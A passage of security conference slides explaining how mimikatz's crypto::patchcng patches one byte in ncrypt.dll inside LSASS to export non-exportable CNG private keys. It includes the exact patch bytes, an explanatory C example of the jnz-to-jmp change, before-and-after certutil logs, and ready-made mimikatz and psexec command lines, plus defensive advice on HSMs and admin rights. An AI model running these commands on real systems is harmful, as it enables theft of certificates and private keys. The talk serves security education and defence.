  • ...all based on rsaenh.dll


mimikatz :: crypto :: cng - how it works
  • "Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
    • http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
  • "To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
  • This time, key operations are not performed in the "user" process context
  • The process uses RPC to call the Key Isolation service (KeyIso) functions
  • It seems more secure than CryptoAPI...
    • It is, but it's not perfect...


mimikatz :: crypto :: cng - how it's exported (PLAYSKOOL level)
  • [Diagram] The user process talks over RPC to the KeyIso service, which runs inside the LSASS process (an NT6 System protected process, integrity label ML_SYSTEM with SYSTEM_MANDATORY_LABEL_NO_WRITE_UP and SYSTEM_MANDATORY_LABEL_NO_READ_UP) and hosts CNG
    • Process: "Ask to export key" (RPC)
    • KeyIso / CNG: load private key, DPAPI decode, then "Exportable ?"
      • yes: the exported key is returned to the process
      • no: NTE_NOT_SUPPORTED is returned to the process


mimikatz :: crypto :: patchcng - because sometimes I own LSASS
  • When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (KeyIso): ncrypt!SPCryptExportKey
  • This function does all the work to prepare the export, and checks whether the key is exportable

Exportable ?

mimikatz output (translated from the French locale):
mimikatz # crypto::exportKeys
[user] CNG keys:
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Exportable : NO
  Key size   : 2048
  Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
  mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) The requested operation is not supported.


mimikatz :: crypto :: patchcng - because sometimes I own LSASS
  • This time, the checks and the keys are in the LSASS process... and what?
  • I wrote "1" byte in LSASS memory space...

Before:
.text:6C815210 75 1C                jnz   short continue_key_export
After:
.text:6C815210 EB 1C                jmp   short continue_key_export
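Both patches, the two rsaenh.dll sites of patchcapi and the ncrypt.dll site of patchcng, do the same thing: a conditional jnz becomes an unconditional jmp, and the displacement bytes are left untouched. The C program below is an added example, not mimikatz code. It applies the same byte substitutions to local buffers holding the bytes and addresses shown on the slides, and checks that the branch target is identical before and after, which is why `33 C7 FF FF`, `B6 3B FF FF` and `1C` can stay exactly as they were. It writes nothing into any process; the module addresses are only used as numbers.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Added example (not mimikatz code): why patchcapi is "4 bytes" (two
 * rsaenh.dll sites, 2 bytes each) and patchcng is "1 byte" (one ncrypt.dll
 * site), and why the original displacement can be kept.
 *
 * x86 encodings involved:
 *   0F 85 rel32  jnz near  (6 bytes)     E9 rel32  jmp near  (5 bytes)
 *   75 rel8      jnz short (2 bytes)     EB rel8   jmp short (2 bytes)
 *   90           nop
 * A relative branch lands at (address of the next instruction + displacement).
 * "90 E9 rel32" starts the jmp one byte later than "0F 85 rel32" but ends at
 * the same address, so rel32 does not need to be recomputed.
 * All work is done on local buffers; nothing is written into a live process.
 */

/* Little-endian 32-bit displacement; unsigned wrap-around addition gives the
 * same result as signed addition. */
static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode the branch whose first byte is at `addr` (bytes in `code`), store
 * its target in *target and return the instruction length, or 0 otherwise. */
size_t decode_branch(uint32_t addr, const uint8_t *code, size_t len, uint32_t *target)
{
    if (len >= 6 && code[0] == 0x0F && code[1] == 0x85) {       /* jnz rel32 */
        *target = addr + 6 + rd32le(code + 2);
        return 6;
    }
    if (len >= 5 && code[0] == 0xE9) {                            /* jmp rel32 */
        *target = addr + 5 + rd32le(code + 1);
        return 5;
    }
    if (len >= 2 && (code[0] == 0x75 || code[0] == 0xEB)) {       /* jnz/jmp rel8 */
        *target = addr + 2 + (uint32_t)(int32_t)(int8_t)code[1];
        return 2;
    }
    return 0;
}

/* Make the jnz at `code` unconditional, in place.
 * Returns the number of bytes changed: 2 (0F 85 -> 90 E9), 1 (75 -> EB),
 * or 0 if the bytes are not a jnz (buffer left untouched). */
size_t patch_jnz_to_jmp(uint8_t *code, size_t len)
{
    if (len >= 6 && code[0] == 0x0F && code[1] == 0x85) {
        code[0] = 0x90;                 /* nop                        */
        code[1] = 0xE9;                 /* jmp rel32, rel32 unchanged */
        return 2;
    }
    if (len >= 2 && code[0] == 0x75) {
        code[0] = 0xEB;                 /* jmp rel8, rel8 unchanged   */
        return 1;
    }
    return 0;
}

/* Patch and check that the branch target is preserved.
 * Returns 1 when the target before and after the patch is the same, 0 if
 * nothing recognisable was patched or the targets differ. After a near patch
 * the jmp sits one byte after `addr`, behind the nop. */
int patch_and_verify(uint32_t addr, uint8_t *code, size_t len, uint32_t *target_out)
{
    uint32_t before, after;
    if (decode_branch(addr, code, len, &before) == 0) return 0;
    if (patch_jnz_to_jmp(code, len) == 0) return 0;
    size_t skip = (code[0] == 0x90) ? 1 : 0;
    if (decode_branch(addr + (uint32_t)skip, code + skip, len - skip, &after) == 0) return 0;
    if (target_out) *target_out = after;
    return before == after;
}

int main(void)
{
    /* Bytes and addresses as displayed on the slides (x86 builds). */
    uint8_t capi1[] = { 0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF };   /* rsaenh.dll, 0AC0B7CB */
    uint8_t capi2[] = { 0x0F, 0x85, 0xB6, 0x3B, 0xFF, 0xFF };   /* rsaenh.dll, 0AC1F749 */
    uint8_t cng[]   = { 0x75, 0x1C };                            /* ncrypt.dll, 6C815210 */
    uint32_t t;

    t = 0; printf("patchcapi site 1: %s, target %08X\n",
                  patch_and_verify(0x0AC0B7CBu, capi1, sizeof capi1, &t) ? "ok" : "MISMATCH", (unsigned)t);
    t = 0; printf("patchcapi site 2: %s, target %08X\n",
                  patch_and_verify(0x0AC1F749u, capi2, sizeof capi2, &t) ? "ok" : "MISMATCH", (unsigned)t);
    t = 0; printf("patchcng  site  : %s, target %08X\n",
                  patch_and_verify(0x6C815210u, cng, sizeof cng, &t) ? "ok" : "MISMATCH", (unsigned)t);
    return 0;
}
```

The 0 return of `patch_jnz_to_jmp` stands in for the check a practitioner makes before touching a real module: verify the expected bytes are at the site first, because the addresses differ between builds. In the talk the resulting bytes are written into the live rsaenh.dll of the caller's own process for patchcapi, and into ncrypt.dll inside LSASS for patchcng.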


mimikatz :: crypto :: patchcng - demo time!
  • Import, export, import as not exportable... export again


mimikatz :: crypto :: patchcng - limitations
  • The patch operation needs some privileges:
    • Admin (debug privilege)
    • SYSTEM
  • mimikatz crypto::patchcng only deals with:
    • Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
  • Not a limitation of mimikatz, but the certificates MMC snap-in cannot export CNG certificates... even those that are exportable (huh?)
    • certutil can...


mimikatz :: crypto :: patchcng - bonus
  • Once one admin has patched LSASS, all users of the current system benefit from the extra exports
    • until reboot / KeyIso service restart
  • Some other programs that don't check the export flag before asking for the export work too
    • Yeah, like the good old one: certutil

certutil output (translated from the French locale), before LSASS is patched:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert hash (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Key container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Provider = Microsoft Software Key Storage Provider
The private key CANNOT be exported
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

Same command after crypto::patchcng:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert hash (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Key container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.


mimikatz :: crypto - memo
  • Some commands:
    • mimikatz crypto::patchcapi crypto::exportCertificates exit
    • psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
    • mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
    • mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
  • Password:
    • PFX files are protected by this password: mimikatz
  • Keys:
    • When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
    • When you delete a certificate, Windows does not delete its private key... funny, isn't it?
      • So yes, mimikatz can export it


mimikatz :: crypto - what can we do?
  • Exactly the same as for sekurlsa: it comes down to preventing access to accounts / computers!
    • no admin, no admin, no admin...
  • Basics
    • Use smart cards / tokens for user certificates
    • Use Hardware Security Modules (HSM), even SoftHSM
  • More in depth
    • See what Microsoft can do with the TPM from Windows 8
      • Virtual Smart Card seems promising
    • Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
      • Their biometrics stuff was a little buggy ;)


mimikatz - what else can it do?
  • Play with minesweeper
  • Manipulate some handles
  • Pass the hash
  • Dump SAM / AD
  • Stop event monitoring
  • Patch Terminal Server
  • Basic GPO bypass
  • AppLocker / SRP bypass
  • Driver
    • Play with tokens & privileges
    • Display the SSDT, x86 & x64
    • List minifilter actions
    • List notifications (process / thread / image / registry)
    • List object hooks and procedures


mimikatz - that's all folks!
  • Thanks to / Merci à:
    • my girlfriend for her support (her LSASS crashed a few times)
    • Application Security Forum for offering me this great opportunity
      • Partners and sponsors for sure!
    • Microsoft for always considering it normal/acceptable
    • Security friends/community for their ideas & challenges
      • nagual, newsoft, mubix, ...
    • You, for your attention!
  • Questions?
    • Don't be shy ;) especially if you have written down the corresponding slide number


Blog, Source Code & Contact
  • blog: http://blog.gentilkiwi.com
  • mimikatz: http://blog.gentilkiwi.com/mimikatz
  • source: https://code.google.com/p/mimikatz/
  • email: benjamin@gentilkiwi.com
